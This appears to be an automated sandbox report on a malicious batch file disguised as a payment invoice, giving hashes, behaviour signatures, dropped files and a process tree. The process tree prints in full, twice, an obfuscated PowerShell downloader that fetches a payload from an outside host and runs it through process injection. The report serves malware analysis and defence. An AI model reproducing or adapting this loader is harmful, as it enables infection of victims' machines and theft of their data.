Overview

overview

8

Static

static

1

payment co...df.bat

windows10-2004-x64

8

Analysis

  • max time kernel
    108s
  • max time network
    108s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22/05/2024, 15:55

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    payment confirmation and invoices_pdf.bat

  • Size

    7KB

  • MD5

    6a0e1a60234d409a8d5c630f84b707f4

  • SHA1

    33ab80ab6ee9ff90d35ff1912090ed68f225f0cb

  • SHA256

    b900fc6ff55f455165bc9f9d1eb1063c72581d372c78ec3be3decb21045450e8

  • SHA512

    92b198585eddbee2d1bfd37736bbe6a1f44a5c751f2dd15cc6c10104af2bb9557990f963a15bbac4ad0e21d3066ba0cb83bc41245e46d67408e72ae5f7d9bbaf

  • SSDEEP

    96:2XOLZvaljhpoAjs3R3R75XVbOVrGTvyoidAdCgpn7wEnx/1XCzlbTX:WSZv4jhaOoHNXbqo8gSlbTX

Score
8/10
execution

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 50 IoCs
  • Suspicious behavior: MapViewOfSection 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 56 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of UnmapMainImage
    PID:3460
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\payment confirmation and invoices_pdf.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1380
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -windowstyle hidden "$Pseudoanatomic = 1;$Rakes='Su';$Rakes+='bstrin';$Rakes+='g';Function Destrueredes($Driftschefen){$Carbonisable=$Driftschefen.Length-$Pseudoanatomic;For($viskning=5;$viskning -lt $Carbonisable;$viskning+=6){$Psykoanalysen11+=$Driftschefen.$Rakes.Invoke( $viskning, $Pseudoanatomic);}$Psykoanalysen11;}function Hellighederne($enoghalvfems){. ($Skolehjemselev) ($enoghalvfems);}$Contraindicative=Destrueredes 'MllerMF rbloDorhazTvistiDes,olCo,julTyrola Tryp/Bysva5 G.ra.Epipt0Unosc Revol(LampaWHighliMi,otnStikldGenteoBrugswBr,desMe,si .orfNTeknoTOp ob .ikhe1.verd0 Hyp .U bri0Caud ;L,cre I.dlaWSievii K ppnAmyla6Tisse4Viklp;Focu, BolixSamme6Unwon4Depri;Dyrek Pr barTogrevRed.i:Tabel1Handl2Farin1Sde.a. F,ra0 Trif) Hve. DorsiGInd se PietcGranukS.uvloAutom/Euerg2 Hoft0Moseh1Senso0konve0Sp,nn1peels0Hex.s1P plo UnreFLageri O nirForlbeNaadsf scrooIntraxR,diu/H.erd1Cemen2Kmpeg1Bhumi.Wahab0 ,ala ';$Nonadmissibleness=Destrueredes ' WinsURe.sls Bibae SammrS,jer-Exc,pAChokegSoli eOkkern Sal tFi,tl ';$Bullfrog=Destrueredes 'Brnd hMelintGds.ntIhndep UndesSohti:Miser/Tysse/ Am,sw Ap ewFigurwpigro.Fastefvirenrhun,raUntr,nBnl,gcStrkskDysp.oFdek,mDiminevalgbr Causc vant.AcerarhologsSti.f/ endBs lutreneraaLagrinAllo,dGuitabSnooto Neusm Nonab,tealeUnher.UdmnthZombih ,tinpSt ff>paakrhOverptDorsatS,vaapCykel:Pasto/Nondi/St im1uvsne9Annex4Lamin.Unrec5Di,ek9Cathe.Etage3 rdia1Curse.Hedvi1Neede0 Lvsp5Volle/cibopBOmpharHu.dra usednOverfd.oncobRamleo ,remm,ljdabZoogre,ssur.Carpeh nvehHispapApost ';$Turacos=Destrueredes 'Vinds>Soko, ';$Skolehjemselev=Destrueredes 'ProviiFi,aneBlletx Fryn ';$Aelurophobe='vagthundes';Hellighederne (Destrueredes 'wa nsSSretneBrndet Pur,- MatcC .arnoPlejen,verut AuteeUndomnDeltatSmoke For a- PincP Lacua OpbrtTeposhTravl KnoglT Me r:La.in\Du.riSYokerlvivida,empebOpistbFamileHy,rar Ga.sa G ned AppesIn.pee cyclrAffat.K eattBoxedxToastt agio Primh-GrundVRespoaTurtllMovabuAbrogePolyt ,isal$BekveAisdaneExau,lMisoru Skr,rStrano skrvp ,idehwako,oldinfbRygepe Unhe; Opsk ');Hellighederne (Destrueredes 'TraadiGravkfBrev Laurb(BrevetRveske Kones.imiit Der -Tore plyd eae,ythtUnconhS.ter K ffeTBo,ig:Kolpo\Du,foSHy erlWeariaafprib.latybSokleeSilonrRhe.faSprogdpolyssOve.ve q,adrSub.m.A,ymmt,jardx ReoltLukke)Unded{Bo.ste Brydx styriKred,tForce}def.o;Progr ');$Shortbread = Destrueredes 'AfstreHalshcU.derhAdvisoLogoe Fal.%TestaaOve tpBarbepRecepdAcu,eaSolavtBrobya Blin%Plume\CongoITilbanGolfeaNe rotKelpytTineteirrepn.aititUndgaij.urno JvninBoligsLydsk.Cr,cuHDisseaA,thon ytte dank,&Overu&afhvl SpidseGarnncRsenehKr sto Peck Unbus$Contr ';Hellighederne (Destrueredes 'Nonhi$,oarsgStammlTaleloSpahibBromkaTilsyl Tr g: Sho ABloodkreviskO.ytriTankelGasral WanteCervisTurbisdiphteRelannGen.re Sk,ir Omfo=Burno(Pagancscripmf ygtdfe.tm Disun/WoolgcMarls U,wed$ProseSPresshOversoBarrirBikortfratrb VrlirSpecie ContaPomphdSptme)Kolla ');Hellighederne (Destrueredes 'Uds i$TriphgReferlGly.eoSn.fybOverbaEpicel,inte:TekniFP,easoApparl AfbriPresoi Svajc Kan o NervlFrataoAdelsu OversTagre= Arbe$ I,dfBR greu SamllIsanoldermafHarbor DigeoDans gStudi. St,ds Thrup Spr.lMarliiLevertVolat(Germa$Bru.sTMusicuS.utcr AlteaFattic AgeroO,eedsStvnp)Revel ');$Bullfrog=$Foliicolous[0];Hellighederne (Destrueredes 'Neoco$DeiksgU,viklAnacoo CrafbUnre,aunrowlHugtn:ConsoSU.dertFo vrv DisseA.sernTimeldTresst,onfaeRimens f,de=OptimNSemifeLun.fwLapel-Mi,jrOoceanb.belpjL ddeeL eric ,edetFluki LilliS,usioyDriftsvinkltsicileRiittmsund .Ta.keNA,lgseOktantsaloo.Kl neWDisk.eReferb SmutCKlikel ServiUblideO.iehnUnb.utBurk. ');Hellighederne (Destrueredes 'I.ddr$ EmmeS Kouztkurrev Vi,teTolu n FremdCombitS,cioe FragsPosse.HavilH UnwaeBenyta BortdDurate Puffr tomssSally[Fulne$TallaN Mo,eoSemianAs,mma,ontrd B.gtmAtmskiindfrsBlathsChondiRatiobKaro l,krefe Bunyn EmiseNo.bisSevensmilie] Sydk=Sve,e$DisorCAfdeloPreconFolketSp.geretud aLi niiAnmeln orddBlrehiWipedcScou.a.istrtOktaniEduc vMetise S,an ');$Grues=Destrueredes ' S fiSSpeectDeepmvIn.useWalnunvandld UnbutvertseSheepsOmlyd. Sig,DAnholo Pr,fw,pitanOp egl anteo Missa ontedMetoxFSignaiHockelPreadeMicro(,emsb$ MayvB StauuSiksalInob lFd.vafSpec.r To ro BoregTrafi,Mave $ a,anATempenKoreotFormsiTyroldPolygi MutucBecoboRhinomHet,raindesrTristicorsaaGry,onMostriUdgratBgeble U de)Ersta ';$Grues=$Akkillessener[1]+$Grues;$Antidicomarianite=$Akkillessener[0];Hellighederne (Destrueredes 'aften$KroohgBandslEuctioTartabP rolaDezinlIndse:TilbaTph,rmuAnomot SoegtschwaaRegresP eop=Afb d( BuksTFremse SregsAftertGavel-Unwa,P BaltaGodfrt Herohco li Sbet.$eksprAIn.henWhe.mtChildisjuskd DiphicleancNoreooAnor.mCheloaAfm lrPolyoiSkiltaSlangn espei Udfots edkeUneff)Glu i ');while (!$Tuttas) {Hellighederne (Destrueredes 'Fanat$ D cigMisedl Kva otilmebLu,tvaWorcelbiwee: VersV StdtiAale.oNeur lSup re co,nrSitu,nS,raieSpirisAdop =Dash,$ Zoost SkinrTran uNrhe.eCereo ') ;Hellighederne $Grues;Hellighederne (Destrueredes ' DemuSBrokotSkovnaBunddrSanggt F go-HeadwSMansllnugumeVo,iee S mipA gon Antia4Natur ');Hellighederne (Destrueredes 'Dkn,n$ MicrgCulotlFor.ooHemo,bUstyra ForslOpsam:AdldeTEngaguA nort,redntMarm.aEnergsM.oca=Frsni(SekteTOpspreCa.ues SigntRemos-exerePurobeaF,naltchiplhS,eje Isati$,nferA EftenFragttLem.niJord dOpgaaiAr.ejc anthotrkvomCerataBygdkrK,lpoiUvrdia Archn.tormiSe.untA knaeV,zor)B,adf ') ;Hellighederne (Destrueredes 'Raaba$R.ugegantislCenteo S,rsbu,allatric,lSawdu:Un itAVidicbRa.cabAdveriKn.ereR,tra=I.dra$ pe agHittil.eskroctenibSkemaaO.sualSonde:repubKDelmaaCosmopTetraimessitVirtuePoly,lFastes InditFlak.aBullskFr.ktsInregtSamar+ Ug o+Nords%Sym a$RetorFAbsoroUnmerlsammeiUnsasiMonascSteleoFinmolNon ooPneumuRm.bls Sprg. KdfacNatesoFrtiduNonvinFeudatConfl ') ;$Bullfrog=$Foliicolous[$Abbie];}$Trstespiser=324058;$Unprefixally=28714;Hellighederne (Destrueredes ' Pre $DebilgMoililScrayoseilebUnderaN urol Gods: klagSStrenhBe.kii tudekarbeji Pol,i Sto. Kalde= .ryp PostGFarineAporotMu.do-saponCB.detoApo onBundltV ndaeF mdonNonpatK neh G ill$.ruisA Br,sn nret SystiKatapdSkibsi SodacCloylo.rstem Mi.laSla,erSpastiCor,iaOvipan Ko.riArylatAa,efeParle ');Hellighederne (Destrueredes ' Phac$ fterg Ko tlgrando lagebBesieaF jtelHj.vn: UndeABloodcNo.neiPrivacEllenuIn valForbuaDenudtGobsmeBeate Norme=Paafu Chore[KomprS GrubyIllegsTechttDb,foeD.ssemTabul.CarnaCCastioB,gkan La,nvconsuePreferLanditA uia] Gymn: Ato.:TokayFBli.trRickioc.ubmmKomp.BKritiaAche.s earcecutwo6Misma4anarkS Ur.ptTradirShuntice.ipnCanadg Mart( Arbe$PladsS LosshTout,iBl.dhkPlaybiNonhyiAphth)Kursi ');Hellighederne (Destrueredes 'Red s$claimgLatitlStriboSam eb PrusaSup rl Stro:Gene,C RetaoU igerSpdbroTaburlSystelris,ni C.rtkRanameDis.e vrvg=Apter Blikd[SkrllSNed uyJomfrsDe.lat Go teStat mSprog. ostfT Stdee.ufttxOverbt Rest. StvkEProcrn p.sicDel,goKilomdSynkri.isden atrgAttri]Mange:N nhu:ChannAThougSFaranC N npI tudICrisp.AntisG Brage GruntCo brSColletHairsrForivi P.efnSkarpg Caon(Unfou$EfterA,porvcT dspiKurv c rycuDem,nlApoteaRheu tfrikte Sub,) Fair ');Hellighederne (Destrueredes 'Rema,$hjordgMet.olKolonoStikpbAcetoaBa,ull .est: ickeP UnderMandeoSpidspFlirta NondgEngeloKejse=Casi $LoeroCStratoLorderTragiobindelTas el hameiBrakpkLophieDisco. acros HylduselvsbFastls SolstTrevirSkam ikumulnHemalgLique(S,vko$.uperTFo.byrFenolsAzskgt UncheKon,msEretrpDiscoi Eft.sSengeeTotchrDaabs,Mownm$TryllUStoranWoodmpAlveor SydseDe.refS,lvaiHi.mex yndiaPi,ollKokkelStartyVista)Se tu ');Hellighederne $Propago;"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4676
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Inattentions.Han && echo $"
          4⤵
            PID:3500
          • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Pseudoanatomic = 1;$Rakes='Su';$Rakes+='bstrin';$Rakes+='g';Function Destrueredes($Driftschefen){$Carbonisable=$Driftschefen.Length-$Pseudoanatomic;For($viskning=5;$viskning -lt $Carbonisable;$viskning+=6){$Psykoanalysen11+=$Driftschefen.$Rakes.Invoke( $viskning, $Pseudoanatomic);}$Psykoanalysen11;}function Hellighederne($enoghalvfems){. ($Skolehjemselev) ($enoghalvfems);}$Contraindicative=Destrueredes 'MllerMF rbloDorhazTvistiDes,olCo,julTyrola Tryp/Bysva5 G.ra.Epipt0Unosc Revol(LampaWHighliMi,otnStikldGenteoBrugswBr,desMe,si .orfNTeknoTOp ob .ikhe1.verd0 Hyp .U bri0Caud ;L,cre I.dlaWSievii K ppnAmyla6Tisse4Viklp;Focu, BolixSamme6Unwon4Depri;Dyrek Pr barTogrevRed.i:Tabel1Handl2Farin1Sde.a. F,ra0 Trif) Hve. DorsiGInd se PietcGranukS.uvloAutom/Euerg2 Hoft0Moseh1Senso0konve0Sp,nn1peels0Hex.s1P plo UnreFLageri O nirForlbeNaadsf scrooIntraxR,diu/H.erd1Cemen2Kmpeg1Bhumi.Wahab0 ,ala ';$Nonadmissibleness=Destrueredes ' WinsURe.sls Bibae SammrS,jer-Exc,pAChokegSoli eOkkern Sal tFi,tl ';$Bullfrog=Destrueredes 'Brnd hMelintGds.ntIhndep UndesSohti:Miser/Tysse/ Am,sw Ap ewFigurwpigro.Fastefvirenrhun,raUntr,nBnl,gcStrkskDysp.oFdek,mDiminevalgbr Causc vant.AcerarhologsSti.f/ endBs lutreneraaLagrinAllo,dGuitabSnooto Neusm Nonab,tealeUnher.UdmnthZombih ,tinpSt ff>paakrhOverptDorsatS,vaapCykel:Pasto/Nondi/St im1uvsne9Annex4Lamin.Unrec5Di,ek9Cathe.Etage3 rdia1Curse.Hedvi1Neede0 Lvsp5Volle/cibopBOmpharHu.dra usednOverfd.oncobRamleo ,remm,ljdabZoogre,ssur.Carpeh nvehHispapApost ';$Turacos=Destrueredes 'Vinds>Soko, ';$Skolehjemselev=Destrueredes 'ProviiFi,aneBlletx Fryn ';$Aelurophobe='vagthundes';Hellighederne (Destrueredes 'wa nsSSretneBrndet Pur,- MatcC .arnoPlejen,verut AuteeUndomnDeltatSmoke For a- PincP Lacua OpbrtTeposhTravl KnoglT Me r:La.in\Du.riSYokerlvivida,empebOpistbFamileHy,rar Ga.sa G ned AppesIn.pee cyclrAffat.K eattBoxedxToastt agio Primh-GrundVRespoaTurtllMovabuAbrogePolyt ,isal$BekveAisdaneExau,lMisoru Skr,rStrano skrvp ,idehwako,oldinfbRygepe Unhe; Opsk ');Hellighederne (Destrueredes 'TraadiGravkfBrev Laurb(BrevetRveske Kones.imiit Der -Tore plyd eae,ythtUnconhS.ter K ffeTBo,ig:Kolpo\Du,foSHy erlWeariaafprib.latybSokleeSilonrRhe.faSprogdpolyssOve.ve q,adrSub.m.A,ymmt,jardx ReoltLukke)Unded{Bo.ste Brydx styriKred,tForce}def.o;Progr ');$Shortbread = Destrueredes 'AfstreHalshcU.derhAdvisoLogoe Fal.%TestaaOve tpBarbepRecepdAcu,eaSolavtBrobya Blin%Plume\CongoITilbanGolfeaNe rotKelpytTineteirrepn.aititUndgaij.urno JvninBoligsLydsk.Cr,cuHDisseaA,thon ytte dank,&Overu&afhvl SpidseGarnncRsenehKr sto Peck Unbus$Contr ';Hellighederne (Destrueredes 'Nonhi$,oarsgStammlTaleloSpahibBromkaTilsyl Tr g: Sho ABloodkreviskO.ytriTankelGasral WanteCervisTurbisdiphteRelannGen.re Sk,ir Omfo=Burno(Pagancscripmf ygtdfe.tm Disun/WoolgcMarls U,wed$ProseSPresshOversoBarrirBikortfratrb VrlirSpecie ContaPomphdSptme)Kolla ');Hellighederne (Destrueredes 'Uds i$TriphgReferlGly.eoSn.fybOverbaEpicel,inte:TekniFP,easoApparl AfbriPresoi Svajc Kan o NervlFrataoAdelsu OversTagre= Arbe$ I,dfBR greu SamllIsanoldermafHarbor DigeoDans gStudi. St,ds Thrup Spr.lMarliiLevertVolat(Germa$Bru.sTMusicuS.utcr AlteaFattic AgeroO,eedsStvnp)Revel ');$Bullfrog=$Foliicolous[0];Hellighederne (Destrueredes 'Neoco$DeiksgU,viklAnacoo CrafbUnre,aunrowlHugtn:ConsoSU.dertFo vrv DisseA.sernTimeldTresst,onfaeRimens f,de=OptimNSemifeLun.fwLapel-Mi,jrOoceanb.belpjL ddeeL eric ,edetFluki LilliS,usioyDriftsvinkltsicileRiittmsund .Ta.keNA,lgseOktantsaloo.Kl neWDisk.eReferb SmutCKlikel ServiUblideO.iehnUnb.utBurk. ');Hellighederne (Destrueredes 'I.ddr$ EmmeS Kouztkurrev Vi,teTolu n FremdCombitS,cioe FragsPosse.HavilH UnwaeBenyta BortdDurate Puffr tomssSally[Fulne$TallaN Mo,eoSemianAs,mma,ontrd B.gtmAtmskiindfrsBlathsChondiRatiobKaro l,krefe Bunyn EmiseNo.bisSevensmilie] Sydk=Sve,e$DisorCAfdeloPreconFolketSp.geretud aLi niiAnmeln orddBlrehiWipedcScou.a.istrtOktaniEduc vMetise S,an ');$Grues=Destrueredes ' S fiSSpeectDeepmvIn.useWalnunvandld UnbutvertseSheepsOmlyd. Sig,DAnholo Pr,fw,pitanOp egl anteo Missa ontedMetoxFSignaiHockelPreadeMicro(,emsb$ MayvB StauuSiksalInob lFd.vafSpec.r To ro BoregTrafi,Mave $ a,anATempenKoreotFormsiTyroldPolygi MutucBecoboRhinomHet,raindesrTristicorsaaGry,onMostriUdgratBgeble U de)Ersta ';$Grues=$Akkillessener[1]+$Grues;$Antidicomarianite=$Akkillessener[0];Hellighederne (Destrueredes 'aften$KroohgBandslEuctioTartabP rolaDezinlIndse:TilbaTph,rmuAnomot SoegtschwaaRegresP eop=Afb d( BuksTFremse SregsAftertGavel-Unwa,P BaltaGodfrt Herohco li Sbet.$eksprAIn.henWhe.mtChildisjuskd DiphicleancNoreooAnor.mCheloaAfm lrPolyoiSkiltaSlangn espei Udfots edkeUneff)Glu i ');while (!$Tuttas) {Hellighederne (Destrueredes 'Fanat$ D cigMisedl Kva otilmebLu,tvaWorcelbiwee: VersV StdtiAale.oNeur lSup re co,nrSitu,nS,raieSpirisAdop =Dash,$ Zoost SkinrTran uNrhe.eCereo ') ;Hellighederne $Grues;Hellighederne (Destrueredes ' DemuSBrokotSkovnaBunddrSanggt F go-HeadwSMansllnugumeVo,iee S mipA gon Antia4Natur ');Hellighederne (Destrueredes 'Dkn,n$ MicrgCulotlFor.ooHemo,bUstyra ForslOpsam:AdldeTEngaguA nort,redntMarm.aEnergsM.oca=Frsni(SekteTOpspreCa.ues SigntRemos-exerePurobeaF,naltchiplhS,eje Isati$,nferA EftenFragttLem.niJord dOpgaaiAr.ejc anthotrkvomCerataBygdkrK,lpoiUvrdia Archn.tormiSe.untA knaeV,zor)B,adf ') ;Hellighederne (Destrueredes 'Raaba$R.ugegantislCenteo S,rsbu,allatric,lSawdu:Un itAVidicbRa.cabAdveriKn.ereR,tra=I.dra$ pe agHittil.eskroctenibSkemaaO.sualSonde:repubKDelmaaCosmopTetraimessitVirtuePoly,lFastes InditFlak.aBullskFr.ktsInregtSamar+ Ug o+Nords%Sym a$RetorFAbsoroUnmerlsammeiUnsasiMonascSteleoFinmolNon ooPneumuRm.bls Sprg. KdfacNatesoFrtiduNonvinFeudatConfl ') ;$Bullfrog=$Foliicolous[$Abbie];}$Trstespiser=324058;$Unprefixally=28714;Hellighederne (Destrueredes ' Pre $DebilgMoililScrayoseilebUnderaN urol Gods: klagSStrenhBe.kii tudekarbeji Pol,i Sto. Kalde= .ryp PostGFarineAporotMu.do-saponCB.detoApo onBundltV ndaeF mdonNonpatK neh G ill$.ruisA Br,sn nret SystiKatapdSkibsi SodacCloylo.rstem Mi.laSla,erSpastiCor,iaOvipan Ko.riArylatAa,efeParle ');Hellighederne (Destrueredes ' Phac$ fterg Ko tlgrando lagebBesieaF jtelHj.vn: UndeABloodcNo.neiPrivacEllenuIn valForbuaDenudtGobsmeBeate Norme=Paafu Chore[KomprS GrubyIllegsTechttDb,foeD.ssemTabul.CarnaCCastioB,gkan La,nvconsuePreferLanditA uia] Gymn: Ato.:TokayFBli.trRickioc.ubmmKomp.BKritiaAche.s earcecutwo6Misma4anarkS Ur.ptTradirShuntice.ipnCanadg Mart( Arbe$PladsS LosshTout,iBl.dhkPlaybiNonhyiAphth)Kursi ');Hellighederne (Destrueredes 'Red s$claimgLatitlStriboSam eb PrusaSup rl Stro:Gene,C RetaoU igerSpdbroTaburlSystelris,ni C.rtkRanameDis.e vrvg=Apter Blikd[SkrllSNed uyJomfrsDe.lat Go teStat mSprog. ostfT Stdee.ufttxOverbt Rest. StvkEProcrn p.sicDel,goKilomdSynkri.isden atrgAttri]Mange:N nhu:ChannAThougSFaranC N npI tudICrisp.AntisG Brage GruntCo brSColletHairsrForivi P.efnSkarpg Caon(Unfou$EfterA,porvcT dspiKurv c rycuDem,nlApoteaRheu tfrikte Sub,) Fair ');Hellighederne (Destrueredes 'Rema,$hjordgMet.olKolonoStikpbAcetoaBa,ull .est: ickeP UnderMandeoSpidspFlirta NondgEngeloKejse=Casi $LoeroCStratoLorderTragiobindelTas el hameiBrakpkLophieDisco. acros HylduselvsbFastls SolstTrevirSkam ikumulnHemalgLique(S,vko$.uperTFo.byrFenolsAzskgt UncheKon,msEretrpDiscoi Eft.sSengeeTotchrDaabs,Mownm$TryllUStoranWoodmpAlveor SydseDe.refS,lvaiHi.mex yndiaPi,ollKokkelStartyVista)Se tu ');Hellighederne $Propago;"
            4⤵
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4300
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Inattentions.Han && echo $"
              5⤵
                PID:3500
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe"
                5⤵
                  PID:4864
                • C:\Program Files (x86)\windows mail\wab.exe
                  "C:\Program Files (x86)\windows mail\wab.exe"
                  5⤵
                    PID:2768
                  • C:\Program Files (x86)\windows mail\wab.exe
                    "C:\Program Files (x86)\windows mail\wab.exe"
                    5⤵
                      PID:1452
                    • C:\Program Files (x86)\windows mail\wab.exe
                      "C:\Program Files (x86)\windows mail\wab.exe"
                      5⤵
                        PID:4544
                      • C:\Program Files (x86)\windows mail\wab.exe
                        "C:\Program Files (x86)\windows mail\wab.exe"
                        5⤵
                          PID:4692
                        • C:\Program Files (x86)\windows mail\wab.exe
                          "C:\Program Files (x86)\windows mail\wab.exe"
                          5⤵
                            PID:1880
                          • C:\Program Files (x86)\windows mail\wab.exe
                            "C:\Program Files (x86)\windows mail\wab.exe"
                            5⤵
                              PID:3132
                            • C:\Program Files (x86)\windows mail\wab.exe
                              "C:\Program Files (x86)\windows mail\wab.exe"
                              5⤵
                                PID:4276
                              • C:\Program Files (x86)\windows mail\wab.exe
                                "C:\Program Files (x86)\windows mail\wab.exe"
                                5⤵
                                  PID:4872
                                • C:\Program Files (x86)\windows mail\wab.exe
                                  "C:\Program Files (x86)\windows mail\wab.exe"
                                  5⤵
                                    PID:3368
                                  • C:\Program Files (x86)\windows mail\wab.exe
                                    "C:\Program Files (x86)\windows mail\wab.exe"
                                    5⤵
                                      PID:2620
                                    • C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
                                      "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
                                      5⤵
                                        PID:4436
                                      • C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
                                        "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
                                        5⤵
                                        • Suspicious use of NtCreateThreadExHideFromDebugger
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        • Suspicious use of SetThreadContext
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious behavior: MapViewOfSection
                                        • Suspicious use of WriteProcessMemory
                                        PID:3940
                                        • C:\Windows\SysWOW64\clip.exe
                                          "C:\Windows\SysWOW64\clip.exe"
                                          6⤵
                                          • Suspicious use of SetThreadContext
                                          • Modifies Internet Explorer settings
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious behavior: MapViewOfSection
                                          • Suspicious use of WriteProcessMemory
                                          PID:232
                                          • C:\Program Files\Mozilla Firefox\Firefox.exe
                                            "C:\Program Files\Mozilla Firefox\Firefox.exe"
                                            7⤵
                                              PID:1732
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4212,i,14486271492189381216,15799931579469722648,262144 --variations-seed-version --mojo-platform-channel-handle=3788 /prefetch:8
                                  1⤵
                                    PID:3700

                                  Network

                                  MITRE ATT&CK Enterprise v15

                                  Replay Monitor

                                  Loading Replay Monitor...

                                  Downloads

                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iut0do3s.pyu.ps1
                                    Filesize

                                    60B

                                    MD5

                                    d17fe0a3f47be24a6453e9ef58c94641

                                    SHA1

                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                    SHA256

                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                    SHA512

                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                    Download Submit

                                  • C:\Users\Admin\AppData\Roaming\Inattentions.Han
                                    Filesize

                                    459KB

                                    MD5

                                    ab050a4ccb484a367721350b9e90e521

                                    SHA1

                                    05d72f79723d265d5226079299c39aea2f78b740

                                    SHA256

                                    aff792ed7a8797771a161cb9666ea5866c995ed6b64fd4b1961006c07aab9050

                                    SHA512

                                    dcab21d8fd188d0246bf950c78ac72ae7ac59b0b5cfec55fe1edf767d80d1f0deaa0cd2d88368ef594861ef0857f7ba71ad2e22d1cf3314d3d12879dd36d7704

                                    Download Submit

                                  • memory/232-67-0x0000000000120000-0x000000000015F000-memory.dmp

                                    Filesize

                                    252KB

                                    Download

                                  • memory/232-65-0x0000000000120000-0x000000000015F000-memory.dmp

                                    Filesize

                                    252KB

                                    Download

                                  • memory/3460-68-0x0000000003020000-0x0000000003100000-memory.dmp

                                    Filesize

                                    896KB

                                    Download

                                  • memory/3940-66-0x0000000000400000-0x00000000005E4000-memory.dmp

                                    Filesize

                                    1.9MB

                                    Download

                                  • memory/3940-64-0x0000000000400000-0x00000000005E4000-memory.dmp

                                    Filesize

                                    1.9MB

                                    Download

                                  • memory/3940-61-0x0000000000400000-0x00000000005E4000-memory.dmp

                                    Filesize

                                    1.9MB

                                    Download

                                  • memory/3940-57-0x0000000000400000-0x00000000005E4000-memory.dmp

                                    Filesize

                                    1.9MB

                                    Download

                                  • memory/3940-56-0x0000000000400000-0x00000000005E4000-memory.dmp

                                    Filesize

                                    1.9MB

                                    Download

                                  • memory/4300-39-0x0000000006E30000-0x0000000006E4A000-memory.dmp

                                    Filesize

                                    104KB

                                    Download

                                  • memory/4300-44-0x00000000092B0000-0x000000000CA51000-memory.dmp

                                    Filesize

                                    55.6MB

                                    Download

                                  • memory/4300-25-0x0000000006220000-0x0000000006286000-memory.dmp

                                    Filesize

                                    408KB

                                    Download

                                  • memory/4300-24-0x00000000061B0000-0x0000000006216000-memory.dmp

                                    Filesize

                                    408KB

                                    Download

                                  • memory/4300-31-0x0000000006290000-0x00000000065E4000-memory.dmp

                                    Filesize

                                    3.3MB

                                    Download

                                  • memory/4300-36-0x00000000068A0000-0x00000000068BE000-memory.dmp

                                    Filesize

                                    120KB

                                    Download

                                  • memory/4300-37-0x00000000068D0000-0x000000000691C000-memory.dmp

                                    Filesize

                                    304KB

                                    Download

                                  • memory/4300-38-0x00000000080D0000-0x000000000874A000-memory.dmp

                                    Filesize

                                    6.5MB

                                    Download

                                  • memory/4300-18-0x0000000074C1E000-0x0000000074C1F000-memory.dmp

                                    Filesize

                                    4KB

                                    Download

                                  • memory/4300-40-0x0000000007B40000-0x0000000007BD6000-memory.dmp

                                    Filesize

                                    600KB

                                    Download

                                  • memory/4300-41-0x0000000007A50000-0x0000000007A72000-memory.dmp

                                    Filesize

                                    136KB

                                    Download

                                  • memory/4300-42-0x0000000008D00000-0x00000000092A4000-memory.dmp

                                    Filesize

                                    5.6MB

                                    Download

                                  • memory/4300-22-0x0000000074C10000-0x00000000753C0000-memory.dmp

                                    Filesize

                                    7.7MB

                                    Download

                                  • memory/4300-23-0x0000000006090000-0x00000000060B2000-memory.dmp

                                    Filesize

                                    136KB

                                    Download

                                  • memory/4300-19-0x00000000052D0000-0x0000000005306000-memory.dmp

                                    Filesize

                                    216KB

                                    Download

                                  • memory/4300-20-0x0000000074C10000-0x00000000753C0000-memory.dmp

                                    Filesize

                                    7.7MB

